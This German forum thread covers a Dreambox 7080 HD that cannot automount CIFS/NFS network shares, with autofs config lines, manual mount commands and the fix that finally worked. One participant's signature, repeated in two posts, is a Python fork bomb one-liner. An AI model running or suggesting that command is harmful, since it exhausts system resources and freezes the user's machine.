7080 mit Netzwerkproblemen

    This site uses cookies. By continuing to browse this site, you are agreeing to our Cookie Policy.

    • 7080 mit Netzwerkproblemen

      Hallo,

      ich habe seit gestern meine 7080 HD als Ersatz für mein verschiedenen anderen Dreamboxen. Leider ist bei mir der Zugriff
      auf meine Netzwerkfreigaben (CIFS) nicht möglich. Die Freigaben werden nicht erkannt. Bei den restlichen Boxen ( 2 x 800 SE V2,
      1 x 800 HD und eine Cloudibox) gibt es keine Probleme.

      Die Freigaben liegen auf einem Windowsserver (SBS 2011).

      auto.network

      Filme -fstype=cifs,rw,nolock,soft,tcp,user=xxx,pass=xxx ://ip/Filme
      Bilder -fstype=cifs,rw,nolock,soft,tcp,user=xxx,pass=xxx ://ip/Bilder
      Aufnahmen -fstype=cifs,rw,nolock,soft,tcp,user=xxx,pass=xxx ://1ip/Aufnahmen
      Musik -fstype=cifs,rw,nolock,soft,tcp,user=xxx,pass=xxx ://ip/Musik

      Hat jemand eine Lösung?

      Gruß

      WI4
      1 X 920 uhd mit 1 x FBC Multistream DVB-S2X an OLED65C97LA, 1 x 7080 HD mit 4 TB HDD an 55UM74507LA, 2 x Dreambox One , 1 x 525 Combo :]
    • Den FileBrowser habe ich aufgespielt. Allerdings habe ich
      keine Ahung was ich hier einstellen muß. Er wird bei mir auf
      dem Bildschirm nicht richtig angezeigt.
      1 X 920 uhd mit 1 x FBC Multistream DVB-S2X an OLED65C97LA, 1 x 7080 HD mit 4 TB HDD an 55UM74507LA, 2 x Dreambox One , 1 x 525 Combo :]
    • Der FileBrowser funktioniert auch nicht bei mir. Nur GS. Selbst bei einem frisch aufgesetzen Image.

      Per Telnet kann ich die Freigaben einbinden:

      mount -t cifs -o username=xxx,passwort=xxx //192.168.10.xx/xxx /media/Aufnahmen
      mount -t cifs -o username=xxx,passwort=xxx //192.168.10.3xx/xxx /media/Musik
      mount -t cifs -o username=xxx,passwort=xxx //192.168.10.xx/xx/media/Bilder
      mount -t cifs -o username=xxx,passwort=xxx //192.168.10.xx/xxx /media/Filme

      Leider muß ich das bei jedem Neustart durchführen.
      1 X 920 uhd mit 1 x FBC Multistream DVB-S2X an OLED65C97LA, 1 x 7080 HD mit 4 TB HDD an 55UM74507LA, 2 x Dreambox One , 1 x 525 Combo :]
    • Hast du in der 7080HD eine physikalische Platte oder versuchst du einen Link aufzubauen zu einer anderen Box?


      Meine Erfahrungen mit dem Newnigma³-Filebrowser (incl. Automounts-Editor):
      DM500HD -> HDD per autofs gelinkt auf DM7080-HDD: geht nicht.
      DM8000HD -> HDD eingebaut. geht.
      DM7080HD -> HDD per autofs gelinkt auf DM8000-HDD: geht nicht.
      Umbau der Festplatte von 8000HD zur 7080HD:
      DM7080HD -> HDD eingebaut: geht.
      DM8000HD -> HDD per autofs gelinkt auf DM7080-HDD: geht nicht.
    • Ich habe eine HDD verbaut die läuft ohne Probleme im Netzwerk.

      Zugriff auf meine Netzwerkfreigaben (SBS 2011) CIFS, NFS laufe nur mit der von mir beschriebenen Methode (Telnet). Nach einem
      Neustart der Box muß ich per Telnet neu mounten.

      Zugriff auf meine anderen Dreamboxen mit HDD habe ich noch nicht getestet. Auf dem Server liegen meine gesamten Filme (8 TB)
      zentral für alle Boxen.
      1 X 920 uhd mit 1 x FBC Multistream DVB-S2X an OLED65C97LA, 1 x 7080 HD mit 4 TB HDD an 55UM74507LA, 2 x Dreambox One , 1 x 525 Combo :]
    • Bin den Weg über das userscrip Plugin gegangen. Die Freigaben kann ich nun nach dem
      Neustart der Box wenigstens per Fernbedienung mounten.
      1 X 920 uhd mit 1 x FBC Multistream DVB-S2X an OLED65C97LA, 1 x 7080 HD mit 4 TB HDD an 55UM74507LA, 2 x Dreambox One , 1 x 525 Combo :]
    • Nur wenig hilfreich wenn man schreibt alles geht nicht alles probiert.Und was gelinkt bedeutet kann ich nur vemuten und hier funktioniert das tadellos
      So wie ich das bei dir verstehe geht der manuelle mount aber der mit autofs generell nicht richtig?
      Images
      • screenshot.png

        58.47 kB, 1,920×1,080, viewed 186 times
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
    • Wie geschrieben funktioniert der manuelle mount ohne Probleme. Der autofs nicht.

      Die verschiedenen Vorschläge im Board bzw. Netz habe ich abgearbeitet. Immer mit einem frisch aufgespielten Image. Es gab keine Verbesserung.

      Auch die Umstellung der Freigaben auf NFS brachte keine Verbesserung.

      Meine Lösung:

      1. userscrip Plugin aufgespielt
      2. Script nach usr/script/
      3. Nach dem Neustart ausführen

      Ist nicht auto aber vom Sofa zu erledigen.
      1 X 920 uhd mit 1 x FBC Multistream DVB-S2X an OLED65C97LA, 1 x 7080 HD mit 4 TB HDD an 55UM74507LA, 2 x Dreambox One , 1 x 525 Combo :]

      The post was edited 1 time, last by WI4 ().

    • Problem ist bei mir gelöst. Die ganzen Plugins "Netzwerkbrouser/FileBrowser" habe ich deinstalliert und die Datei auto.network
      angepaßt.

      auto.network sieht jetzt so aus:

      Musik -fstype=cifs,rw,soft,rsize=8192,wsize=8192,user=xxx,pass=xxx ://ip/Musik
      Aufnahmen -fstype=cifs,rw,soft,rsize=8192,wsize=8192,user=xxx,pass=xxx ://ip/Aufnahmen
      Bilder -fstype=cifs,rw,soft,rsize=8192,wsize=8192,user=xxx,pass=xxx ://ip/Bilder
      Filme -fstype=cifs,rw,soft,rsize=8192,wsize=8192,user=xxx,pass=xxx ://ip/Filme
      Schlafzimmer -fstype=nfs,ro,soft,tcp,nolock,rsize=8192,wsize=8192 ip:/media/hdd

      Jetzt werden die Freigaben auf dem SBS und die HDD auf der 800 se eingebunden.
      1 X 920 uhd mit 1 x FBC Multistream DVB-S2X an OLED65C97LA, 1 x 7080 HD mit 4 TB HDD an 55UM74507LA, 2 x Dreambox One , 1 x 525 Combo :]
    • Ich habe gerade festgestellt das die namensauflösung auf der 7080 alles andere als zuverlässig ist.Den ganzen tag gingen nur IP's beim mounten ich habe die fritzbox rauf und runter gestartet und dann hab ich die netzwerkeinstellungen auf der box gelöscht und nochmal angelegt und das geht und es war sicher nichts anderes eingestellt.
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !